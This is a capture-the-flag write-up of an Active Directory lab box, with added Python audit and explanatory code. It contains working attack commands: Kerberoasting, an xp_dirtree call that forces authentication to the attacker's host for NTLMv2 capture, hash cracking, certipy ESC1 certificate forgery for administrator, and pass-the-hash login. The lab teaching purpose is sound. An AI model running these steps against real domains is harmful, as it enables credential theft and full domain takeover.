Myles Nieman

Overcertified

Overview

Overcertified is an easy Windows Active Directory box with an Active Directory Certificate Services (ADCS) twist. The LDAP service account (ldapusr) has its own password stored in its LDAP description attribute, an embarrassingly common real-world misconfiguration. With those credentials, BloodHound reveals a Kerberoastable MSSQLSERVER account whose cracked password gives MSSQL access. Inside MSSQL, xp_dirtree forces an outbound SMB authentication that Responder captures as thomas’s NTLMv2 challenge-response. After cracking it and logging in as thomas, certipy identifies the Auth certificate template as vulnerable to ESC1 (enrollee-supplied Subject Alternative Name on a template with a Client Authentication EKU). Requesting a certificate for administrator@certified.htb and authenticating with it via PKINIT yields the Administrator NTLM hash, completing the domain compromise.

Path: LDAP description → ldapusr:ldapisfun → Kerberoast MSSQLSERVER → MSSQL xp_dirtree → capture thomas’s NTLMv2 → WinRM as thomas → certipy ESC1 → certificate as Administrator → NTLM hash → pass-the-hash → root.

Enumeration

A full port scan identifies a Windows domain controller for certified.htb. The open ports are the standard domain controller set (DNS, Kerberos, RPC, SMB, LDAP/LDAPS, global catalog, WinRM, ADWS); nothing here advertises ADCS directly, which is why the certificate templates only surface later through certipy:

$ nmap -p- -A 10.129.229.25 -Pn
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
9389/tcp  open  mc-nmf        .NET Message Framing

Nmap output confirming certified.htb domain controller

Domain: certified.htb, hostname: CERTIFIED. Adding both certified.htb and CERTIFIED.certified.htb to /etc/hosts.

Anonymous SMB and RPC enumeration return nothing useful. An anonymous LDAP bind succeeds, however, and the directory allows unauthenticated reads of user objects, notably:

  • CN=ldapusr,CN=Users,DC=certified,DC=htb
  • MSSQLSERVER service account
  • thomas

The ldapusr object’s description attribute contains the account’s own password: ldapisfun.
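The description attribute is worth checking on every account, not just the one that happens to stand out. The following is an added example, not part of the original writeup: it pulls sAMAccountName and description for every user over an anonymous bind (assuming the ldap3 package and a DC that permits anonymous reads, as this box does) and triages descriptions that look like they carry a credential. The flagging logic runs offline on the constructed sample entries embedded below; the live query is only invoked when a DC host is passed on the command line.

```python
"""Triage LDAP user descriptions for leaked credentials.

Added example, not from the original writeup. The live query assumes the
ldap3 package and an anonymous-bind-friendly DC; SAMPLE_ENTRIES are constructed.
"""
import re
import sys

# Words that commonly sit next to a password pasted into a description field.
PASSWORD_HINTS = re.compile(r"pass(word|wd)?|pwd|cred|secret|login", re.IGNORECASE)


def flag_description(description):
    """Return a reason string if the description looks like it carries a password, else None."""
    text = (description or "").strip()
    if not text:
        return None
    if PASSWORD_HINTS.search(text):
        return "password keyword in description"
    # A single token with no whitespace is rarely a real description. Service
    # accounts like ldapusr above carry a bare password exactly this way.
    # Expect some false positives (e.g. "Contractor"); this is triage, not proof.
    if " " not in text and len(text) >= 6:
        return "single-token description, possible bare password"
    return None


def audit(entries):
    """entries: list of {"sAMAccountName": str, "description": [str, ...]}.
    Returns (account, description, reason) for every suspicious description."""
    findings = []
    for entry in entries:
        for desc in entry.get("description", []):
            reason = flag_description(desc)
            if reason:
                findings.append((entry["sAMAccountName"], desc, reason))
    return findings


def fetch_user_descriptions(dc_host, base_dn):
    """Anonymous bind and pull every user that has a description set (requires ldap3)."""
    from ldap3 import ALL, SUBTREE, Connection, Server  # imported lazily so the offline part needs no ldap3

    server = Server(dc_host, get_info=ALL)
    conn = Connection(server, auto_bind=True)  # no user/password: anonymous bind
    conn.search(base_dn, "(&(objectClass=user)(description=*))", SUBTREE,
                attributes=["sAMAccountName", "description"])
    entries = []
    for e in conn.entries:
        attrs = e.entry_attributes_as_dict  # every attribute as a list of values
        entries.append({
            "sAMAccountName": (attrs.get("sAMAccountName") or [""])[0],
            "description": list(attrs.get("description") or []),
        })
    return entries


# Constructed sample mirroring the finding on this box plus some realistic noise.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "ldapusr", "description": ["ldapisfun"]},
    {"sAMAccountName": "thomas", "description": ["Sales engineer, Reading office"]},
    {"sAMAccountName": "svc_backup", "description": ["Initial password: Winter2024!"]},
    {"sAMAccountName": "mssqlserver", "description": []},
]


if __name__ == "__main__":
    if len(sys.argv) == 3:  # usage: script.py <dc_host> <base_dn>
        entries = fetch_user_descriptions(sys.argv[1], sys.argv[2])
    else:
        entries = SAMPLE_ENTRIES
    for account, desc, reason in audit(entries):
        print(f"[!] {account}: {desc!r} ({reason})")
```

Run it against the box with `python3 ldap_desc_audit.py 10.129.229.25 "DC=certified,DC=htb"` (file name is the reader's choice); with no arguments it audits the constructed sample and flags ldapusr and svc_backup only.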

Foothold — BloodHound Collection and Kerberoasting

With ldapusr:ldapisfun, BloodHound can be collected:

$ python3 /tools/bloodhoundCE-py/bloodhound.py -u ldapusr -p "ldapisfun" \
    -d certified.htb -c All --zip -ns 10.129.229.25

BloodHound collection running as ldapusr

A Kerberoastable users cypher query in BloodHound identifies MSSQLSERVER:

BloodHound query showing MSSQLSERVER as kerberoastable

Requesting the service ticket requires syncing the clock first: Kerberos rejects requests whose timestamp differs from the KDC by more than the default 5-minute tolerance (KRB_AP_ERR_SKEW), and this host was 7 hours off:

$ sudo systemctl stop systemd-timesyncd.service
$ sudo rdate -n certified.htb
$ GetUserSPNs.py certified.htb/ldapusr:ldapisfun -dc-ip 10.129.229.25 -request

Clock sync required before Kerberos operations

Cracking the resulting TGS hash with hashcat:

$ hashcat -m 13100 SQLHash /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Hashcat cracking the MSSQLSERVER Kerberoast hash

Recovered credentials: mssqlserver:lucky7

The full scan above did not list MSSQL (1433 was reported filtered at the time); a targeted rescan of port 1433 shows it open. Connecting with impacket, using Windows authentication since mssqlserver is a domain account:

$ mssqlclient.py certified.htb/mssqlserver:lucky7@certified.htb -windows-auth

mssqlclient connected to the MSSQLSERVER instance

Lateral Movement — xp_dirtree to NTLMv2 Capture

xp_cmdshell cannot be enabled, but xp_dirtree works. It makes SQL Server open the supplied UNC path, and because the procedure runs in the context of the SQL Server service account rather than the connected login, the identity that authenticates to an attacker-controlled SMB server is whichever account the service runs as. Starting Responder on the tun0 interface and pointing xp_dirtree at our host (mssqlclient exposes xp_dirtree as a built-in command):

xp_dirtree \\10.10.14.3\ha1ks

xp_dirtree forcing outbound SMB authentication

Responder capturing thomas’s NTLMv2 hash

Responder captures thomas’s NTLMv2 challenge-response, which tells us the SQL Server service runs as thomas. Unlike an NT hash, an NTLMv2 response cannot be passed or relayed after the fact; it can only be cracked (hashcat mode 5600):

$ hashcat -m 5600 thomashash /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Hashcat cracking thomas’s NTLMv2 hash

Credentials recovered: thomas:159357
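What hashcat does for each candidate in mode 5600 is small enough to reimplement, and doing so makes clear why the capture is a challenge-response rather than a reusable hash. The block below is an added example, not code from the writeup, Responder or hashcat. It derives the NT hash (MD4 over the UTF-16LE password), the NTLMv2 hash (HMAC-MD5 over UPPER(user) + domain), and NTProofStr (HMAC-MD5 over server challenge + blob), then compares against the proof field of a Responder-style `user::domain:challenge:proof:blob` line. MD4 is implemented inline because hashlib.new("md4") is missing on OpenSSL 3 builds without the legacy provider. The sample line is constructed with a fixed server challenge and a minimal blob; the challenge, blob and FILETIME in it are assumptions for the demonstration.

```python
"""Offline NTLMv2 candidate check (what hashcat -m 5600 does per password).

Added example, not from the writeup. MD4 is inlined for portability; the
sample capture built by build_sample_line() is constructed, not a real one.
"""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; only needed here to produce the NT hash."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((56 - (len(data) + 1) % 64) % 64) + struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F = (b & c) | (~b & d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)):  # round 2: G
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3: H
            a = _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    # Key derivation: HMAC-MD5(NT hash, UPPER(user) + domain), domain case as the client sent it.
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    # The 16-byte value Responder prints as the fourth field; the blob is appended unchanged.
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str):
    """Responder / hashcat 5600 layout: user::domain:server_challenge:ntproofstr:blob (hex fields)."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def verify_candidate(line: str, password: str) -> bool:
    """True if `password` reproduces the NTProofStr in the captured line."""
    user, domain, challenge, proof, blob = parse_responder_line(line)
    return hmac.compare_digest(nt_proof_str(password, user, domain, challenge, blob), proof)


def build_sample_line(user: str, domain: str, password: str) -> str:
    """Constructed capture for demonstration: fixed server challenge and a minimal NTLMv2 blob."""
    server_challenge = bytes.fromhex("1122334455667788")            # assumed, 8 bytes
    blob = (bytes.fromhex("0101000000000000")                         # blob signature + reserved
            + struct.pack("<Q", 133_000_000_000_000_000)              # assumed FILETIME timestamp
            + bytes.fromhex("aabbccddeeff0011")                       # assumed client challenge
            + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)                # reserved, MsvAvEOL, reserved
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    captured = build_sample_line("thomas", "CERTIFIED", "159357")
    for guess in ("password", "159357"):
        print(f"{guess!r}: {'match' if verify_candidate(captured, guess) else 'no match'}")
```

Because the server challenge and the client's blob are bound into NTProofStr, a captured line is only good for this offline check (or for relaying in real time); it does not give pass-the-hash, which is why the next step is cracking rather than reuse.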

User

Logging in as thomas (via WinRM on 5985) and checking group memberships shows no special privileges or admin groups:

thomas has no special groups or elevated privileges

The user flag is in thomas’s home directory.

Privilege Escalation — ADCS ESC1

The initial BloodHound collection did not include certificate template data. Running certipy with the -bloodhound flag adds it:

$ certipy find -u "thomas" -p "159357" -bloodhound -target certified.htb

certipy bloodhound output — GUIDs not resolving

Using the -old-bloodhound flag produces a format that BloodHound CE resolves correctly:

$ certipy find -u "thomas" -p "159357" -old-bloodhound -target certified.htb

certipy old-bloodhound output loaded into BloodHound

Reviewing the certipy text output shows the Auth template is vulnerable to ESC1:

[!] Vulnerabilities
  ESC1: 'CERTIFIED.HTB\\Domain Users' and 'CERTIFIED.HTB\\Authenticated Users'
        can enroll, enrollee supplies subject and template allows client authentication

ESC1 is the combination of four template properties: low-privileged principals hold Enroll rights, the enrollee supplies the subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag), the EKU set permits client authentication, and issuance needs neither manager approval nor authorized signatures. certipy checks all four before printing the finding above. Together they mean any domain user can request a certificate from the Auth template and specify an arbitrary UPN in the Subject Alternative Name, including administrator@certified.htb, and the CA will sign it.

ESC1 vulnerability description from the Certified Pre-Owned whitepaper
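The four conditions are easy to encode, which is useful both for reading certipy's JSON output by hand and for auditing templates from the defensive side. The block below is an added example and not certipy's own code: each template is a dict of the AD attribute values ADCS uses (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage OIDs) plus the SIDs holding Enroll rights. The sample templates, the domain SID and the flag values on the non-vulnerable templates are constructed to resemble the defaults, not taken from the box.

```python
"""Evaluate certificate templates for the ESC1 condition set.

Added example, not certipy's code. Flag constants are the documented
msPKI-* bit values; the sample templates and domain SID are constructed.
"""

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: CA manager approval

# EKUs under which a certificate can authenticate a principal to AD (Kerberos PKINIT / Schannel).
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}

WELL_KNOWN_LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_DOMAIN_RIDS = {"513", "515"}               # Domain Users, Domain Computers


def is_low_privileged(sid: str) -> bool:
    return sid in WELL_KNOWN_LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_DOMAIN_RIDS


def allows_client_auth(ekus) -> bool:
    # An empty EKU set means the certificate is valid for every purpose, which includes client auth.
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def esc1_reasons(template) -> list:
    """Return the ESC1 conditions this template satisfies; ESC1 needs all four."""
    reasons = []
    if any(is_low_privileged(s) for s in template["enroll_sids"]):
        reasons.append("low-privileged principals can enroll")
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    if allows_client_auth(template["ekus"]):
        reasons.append("EKU permits client authentication")
    if not (template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS) and template["ra_signatures"] == 0:
        reasons.append("no manager approval or authorized signatures required")
    return reasons


def is_esc1(template) -> bool:
    return len(esc1_reasons(template)) == 4


def find_esc1(templates) -> list:
    return [t["name"] for t in templates if is_esc1(t)]


DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed

# Constructed templates: "Auth" mirrors the finding on this box; the others are typical non-ESC1 shapes.
TEMPLATES = [
    {"name": "Auth", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"],
     "enroll_sids": [DOMAIN_SID + "-513", "S-1-5-11"]},
    # Default-style User template: the CA builds subject and SAN from AD, so no enrollee-supplied subject.
    {"name": "User", "name_flag": 0xA6000000, "enrollment_flag": 0x29,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
     "enroll_sids": [DOMAIN_SID + "-513"]},
    # Enrollee supplies the subject, but only Server Authentication EKU and only Domain Admins enroll.
    {"name": "WebServer", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.1"],
     "enroll_sids": [DOMAIN_SID + "-512"]},
    # Same as Auth but with manager approval switched on: requests sit pending, so not ESC1.
    {"name": "AuthApproved", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": [DOMAIN_SID + "-513"]},
]


if __name__ == "__main__":
    for t in TEMPLATES:
        print(f"{t['name']}: {'ESC1' if is_esc1(t) else 'ok'} ({', '.join(esc1_reasons(t))})")
```

The AuthApproved entry is the cheapest fix for a template like Auth when the enrollee really must supply the subject: requiring CA manager approval (or an authorized signature) removes the fourth condition without touching the EKU or the enrollment ACL.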

Requesting a certificate impersonating the Administrator:

$ certipy req -u "thomas" -p "159357" -ca "CERTIFIED-CA" \
    -template "Auth" -upn administrator@certified.htb -target CERTIFIED-CA

certipy successfully requesting a certificate as administrator@certified.htb

Authenticating with the certificate: certipy auth performs PKINIT with the PFX to obtain a TGT as administrator, then requests a user-to-user (U2U) service ticket for itself and decrypts the PAC, whose NTLM supplemental credential carries the account's NT hash. One caveat for real environments: on domains where the KB5014754 certificate-mapping hardening is in Full Enforcement, a certificate without the SID security extension (as this one is) fails PKINIT, and newer certipy releases have to be asked to add that extension at request time.

$ certipy auth -pfx administrator.pfx

certipy auth recovering the Administrator NTLM hash via PKINIT

Root

Pass the Administrator NTLM hash into Evil-WinRM for a root shell:

$ evil-winrm -u Administrator -H <hash> -i certified.htb

Evil-WinRM shell as Administrator

Domain compromised.

Takeaways

  • Storing a password in an LDAP description field is a real-world finding that surfaces regularly; always check the description attribute on service accounts during LDAP enumeration.
  • ADCS ESC1 is one of the most impactful ADCS misconfigurations: a template that any domain user can enroll in, that allows an enrollee-supplied SAN, that has a client-authentication EKU, and that needs no manager approval or authorized signatures lets any enrollee obtain a CA-signed certificate for any identity in the domain, including Administrator, with no exploit code required. Fixing any one of those four properties on the template closes it.